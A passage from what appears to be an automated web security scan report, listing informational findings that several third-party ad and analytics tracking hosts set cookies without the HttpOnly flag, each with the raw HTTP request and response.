ETag: "4DB736E5-65C3-2A5A32CD"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www409
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

14.102. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79784419631912  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79784419631912

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79784419631912?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A4%202%20300&pageName=EULA%20-%20Terms%20of%20Use&products=%3B&c1=noncustomer&v1=noncustomer&h1=Home//EULA%20-%20Terms%20of%20Use&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:30 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:30 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:30 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:30 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:30 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:30 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:30 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736E2-0C07-4781234A"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www409
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

14.103. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79902329597084  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79902329597084

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79902329597084?AQB=1&pccr=true&&ndh=1&t=26/3/2011%2016%3A14%3A49%202%20300&pageName=Omniture%20Password%20Recovery%20Page&products=%3B&c1=noncustomer&v1=noncustomer&h1=Home//Omniture%20Password%20Recovery%20Page&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|0-0|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:15 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9B698514A535-4000018C000090B3|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:15 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9B698514A535-4000018C000090B5|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:15 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9B698514A535-4000018C000090B7|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:15 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9B698514A535-4000018C000090B9|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:15 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:15 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:15 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736D3-4A5E-48AED958"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www496
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

14.104. http://p.opt.fimserve.com/bht/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /bht/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bht/?px=20&v=1&rnd=1303843577231 HTTP/1.1
Host: p.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: LO=00MD66Bgm1.00CK000J08NhNS1; Domain=.opt.fimserve.com; Expires=Tue, 26-Jul-2011 18:46:21 GMT; Path=/
Content-Type: text/html
Content-Length: 0
Date: Tue, 26 Apr 2011 18:46:20 GMT


14.105. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3306 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303743268_10164:0_10638:0_10640:0_10641:0_1437:0_1660:563596; uid=1_1303743268_1303179323923:6792170478871670; kwd=1_1303743268_11317:0_11717:0_11718:0_11719:0; sit=1_1303743268_719:827:0_2451:51696:46596_3236:209659:209541_782:563945:563596; cre=1_1303743268; bpd=1_1303743268; apd=1_1303743268; scg=1_1303743268; ppd=1_1303743268; afl=1_1303743268

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:00 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303848180_12704:0_10164:104912_10638:104912_10640:104912_10641:104912_1437:104912_1660:668508; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: uid=1_1303848180_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: kwd=1_1303848180_11317:104912_11717:104912_11718:104912_11719:104912; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: sit=1_1303848180_3306:0:0_719:105739:104912_2451:156608:151508_3236:314571:314453_782:668857:668508; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: cre=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: bpd=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: apd=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: scg=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: ppd=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: afl=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 26 Apr 2011 20:03:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 290

<!-- campaign #12704 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...

14.106. http://pixel.mathtag.com/event/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/js?mt_id=101241&mt_adid=100255&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303691668

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x4 pid 0x71ef 29167
Cache-Control: no-cache
Content-Type: text/javascript
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Tue, 26 Apr 2011 18:46:16 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1303843576; domain=.mathtag.com; path=/; expires=Wed, 25-Apr-2012 18:46:16 GMT
Content-Length: 2116

   /*
   http://action.mathtag.com/mm//PHOE//lpg?nm=LandngPg&s0=&s1=&s2=&v0=&v1=&v2=&ri=[RandomNumber]
   http://tags.bluekai.com/site/1654?ret=pp&_bkt=3&_bks=RMDhBtDtjMQ=
   http://www.googleadservices.com/p
...[SNIP]...

14.107. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=803168029;fpan=0;fpa=P0-2123435684-1303854386635;ns=0;url=http%3A%2F%2Fwww.widgetbox.com%2Flist%2Fmost_popular;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303854387569;tzo=300;a=p-3ayZhMX92Pd1o HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=ECMAFu8kjVmtjIMLyxuBAVcBzQaB0QDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=977076&id=755565&id=744649&id=1056982&id=1056950&id=1056980&id=1056949&id=744655&t=2
Set-Cookie: d=EF0AFu8kjVmtjIMLyxuBAXABzQaB0QDe0k_Boc0jjUKjsY5cH0L-EZIMuBfDCDgYgSIMEDDoQPGRggGhjjH_EADokgAQLbZ6Qw; expires=Mon, 25-Jul-2011 21:46:17 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Tue, 26 Apr 2011 21:46:17 GMT
Server: QS


14.108. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4140 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%264140%3D1; expires=Thu, 26-May-2011 18:46:44 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C0%2C1%2C%2C; expires=Thu, 26-May-2011 18:46:44 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.109. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=7zRdy3HvetQzzJrusGV0WgUYWXerDbWSrgMFxw-mCPoYOsR8WF6iMILz5GrRaTzYj9ILcvkNLozW5XfQm-OIAw&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=RNJ9hNp_Ytke4K3_MLDetaBZCzjPRhryFEOqult4msa76nVUEQrqCfHGx7lLD55exEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7YnPNAqpsobwskjQzsb37_Pf2EzZTks7MGb0-GsBSAyZLfwESJ4HNhmJtjvBex-YKB5MGYB2nENTxzt6uCLwC5ZNpEEy1Y6E_EHxRfmbLZ1cZAp6lfWXEyXpQ0UKYwGF6TGhPyeXqnVY7Z3281c6JDsemNa-3CGw7dg2Xbxl9yyj4GzMLLi_eaSDDqINHp02oDhNKKp2uy6Jf_izbJ4fT1Iu_2URTPQwp7prxJqmG7gw9SyCjmpX6JZPgLa8yTvHuZqGjdQJTtjVZ9bXK_YQ_BTqP4noXltQtlWO_ADLz9yaG1HPNJmxjyYHWoZ-RvqO1R0S-iv_7FnY0Y5Xeddz_jO_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrDwtRWptERdq1_CwAIiDWPEKR1gXBTdH5jry0PtoQ1AeLHTgneiPs4w-PNB0rlR8LbQ13hqHz-NHOrXrabdjXmcRCHTQmWZ5Wp2jjyoTn-TRx9yZxewgOeaPJ0dTEeD2PttBPdeqoht9ByqjYbOh33ulo3YD0zbB9W6Jh-fPou70xdysS9NILgDVV-2RjchUloGmpS1vpTy7CEw_F27aSBKrxrCOwXSkhXOnAokDiKNJ7fwESJ4HNhmJtjvBex-YKAXUSxCCUQ26wFsXGXfUWiK7dQaUAsNKGmGOpY_21OII2rMkfzJCRjod-12LuM3yNFSsZtDmqT68cmfxNCdttVxemNa-3CGw7dg2Xbxl9yyjxUjUlBm2w0A6oYt2TFvb88wfqRHkdzRktg9x4ASm7mYj6Inq-va6FwQyLupvU3--XP7Da31DnYEVo5TPgRz20HK8hNK5y4spsdBx22_Atqh4yf7gWdRyY4nO--zz6sln7A3_z4NlZPxFoPt3Uw_aRVSN0m2klEeTW1KA1di8OAYXXVxlTgh_voK6emDWdftgO-nut4CNoTli9hKdQgGGL_ArFbsMU7SM_RHjy_6zjGAVdA-aRZXmNDP7lSI2wQSG_ZkBdgJgIHJ_0GD9hEAnNu6lhUpb2IzujoXnFpxd00nfu4977TrZ8GHyhed93dEHYQYHOHaF4abG8I094dduCWyYLZMG4wQKFopdYuz1yBkrjocbhf_en5ky2Zgm3rpe_TLLYkm6ow_hSldLzYIRQzPkiGLTlQAB-AyRlZy8hNM5CZdwH63dX586rlVt-rm7T5lk3rNTcwPq3Nv0aBcfX_WCWnBzCQuIbOVa7F8E-DsQQ0XtSgyP9-pRtjKBA9Cw6KpKCQRV_nuo9XTdqfcEuFjw1q3jr96MmE73EdnErm3vwl2KfkvqpOe3sJLkGJnPxWaM37S_qVbKjiLc0d7HG2j37arSozuBgqeZjp8etrKP0MMPHRCJQircGmeFefpToKqMVJJLJFDSB1wQojnNFLZVi-KxNkQ_VJiUnD6sFTZsgkWZhbwRXzuNDStWlCtyOUwHwhiIhI6vYlDAmBKnXtBmdLEA3K48MCNCNawEQzJsDf_Pg2Vk_EWg-3dTD9pFR_es5qV3056KPq2rUT5zBRTUUfVyhkIRasPswtxI7iKl7s6FAXEc8n5El2XcbrTucHE0v-tlwP1vZz1VQYwdIxV0D5pFleY0M_uVIjbBBIbBawJhlLv8g8ldsI-35kGCJVwRl8sycZ0PAtWrVTViuFYrui1COy2KOTpvlid1x6YDCy0LXBHUGgi2TaPtaYUWrJgtkwbjBAoWil1i7PXIGSp-mVft7M-LblYrLgbicDRcQIWfivnSOLEVf1fvaJ0LD4GOmXn-MdBpj5v6mUeKpEu_qA1v2JfEexKn5Jue0cnG6zc79hiM8lP3DRxPQPRgI0_xuWp1g1tkjZsLrAdv1550JC_L7GVNyA8GmhInk0modn5i3E9PsY1OXjKV8iYCdqOsFLtLW59aQLrs4R_Sm6HRv-fT0qZpcVwrwAMPoWw2SuEzmZPy7Pr3B2CT3i7f8WgzvsrFMQFtFLJosfmmwkcBIXiYC5KD6oiDkyhrBnCDrTceeWmOo3AglxIXXfIZd248k5q7u-e5MH_3Xle2fFdIDPTok26GX0-9FGi9EqsKDQR55l7woSi_1v5QjXhRriTW_fRiD-EyoZMz5Idfibr8WjiDSnM4ZZATJKUQIeAiWWBUQxuKfY0m-KUHuSwyrtLP__ldjsbRYS1T0uHXJk24PSL8z3mFkMRObsNqHzbQA0GI3YPOGb-lYcNs_O6CBvbTlsrpNMd1ulI4WK-iRF7ehMgm_ROAJYmpIw1CyVHCx4Lh6UpiYYG1o8vcl5mQP9VGVJnredzylZiYSDC8VOJU0K6xTdplSIqaWyjrlo4KhxO6BPAp6mtQbed5gA0Cjgnp6Rw5lmAsU07N51K5j3PZSzxrE9kN_uZFovGfORhH6MoH1n1mLx2USSZv2x8_HGESPaIScxefiiPNK0OCUG5MdnRQlgwUbxU_0BtXy0yd8WW2V42t-IFhBe9yaSFw1_tpW4L2632z_PWw-s3g_lGgo6LZg0d3xlBa7ocQft3sG2mMmWuyyqIdPSqtxjRklIlnrGECTG2lMEZCOsAdkiEkwcNQoFjB6uEJlwUgsEKF4_WO7NWBkt0qQueOBvF3XTM0Qj0i6d6Ne-SMo9ZRW34nL2E8dfUI4qK_3hTt65_O1ilUO_qIHp6Muzc_la1U_2OjiAOU7PEbuWm84pe5TEp0-dwH4uGF_DEF6HvhgoubqHZESmqy0_uUoo7aAuONZ3XbPI2lPBO0ew9_baQ3iGFyTbNllGW2-6SPL-Yz_5v0XPkSOvI7kYSdc19CnoSeevm6OsBW-cQfSWP67IsCnN3J3RK7HJ47DOwUgikkAA72ly1dOLu1ZkDcoAF8YeGRX_lq7jZ32JrugGCjUIuqMkyLoTQYaIc9uW48ZcNu2ciILtP-yK1JywsvYFiqMlV9gHJ2EXSlkdHYPQHM9nqB2E7HqGtyuc3OfzTlki21Iked0l5Ymb2bmtH2iyNubJGsSKw_zqF-QjnG4_NexZYaYWdSdJxVooCOghLFZBKn_0EQO2vAre22F8lnSmyeDcza7YGogWldkaT1u5x3E36xXrNS7o-uQk9nl956dFM0clLfmZEZSVy6Y-xcSL0nyDvBegaxMxUkPFg2MrXe2Tu6RZYK_eJ83sbVbZgk4Mm2xjvgW7-OS05wcvyGHBsJw9q1CYZ-KKGVDzHPl9zlz7CulV5IVqtOgzxHZaVHOIdEQIOjCbv6Ls4W-7l6hZieh5H5pfJvz0_xp0u9Sr3Ow-0lehezJJr2l8tby08-BywuvZFxyM4somZiu5xkNZQ15_U6Rpo-UcV-kqgda3I_RK6XB_G-nPmaE7wHqMJQ3-EmxOFvfzd5YD06fPVNZ1LTBZN4ocL1Rk_SlsYqw7IlYjuWqlv4egixt5B17GL1Jx5afmr; fc=S44WeTE_hcsignE6AFtjxTFBxEpH-UBt3Uc78oaz-ks4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtkVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1; uid=2931142961646634775; 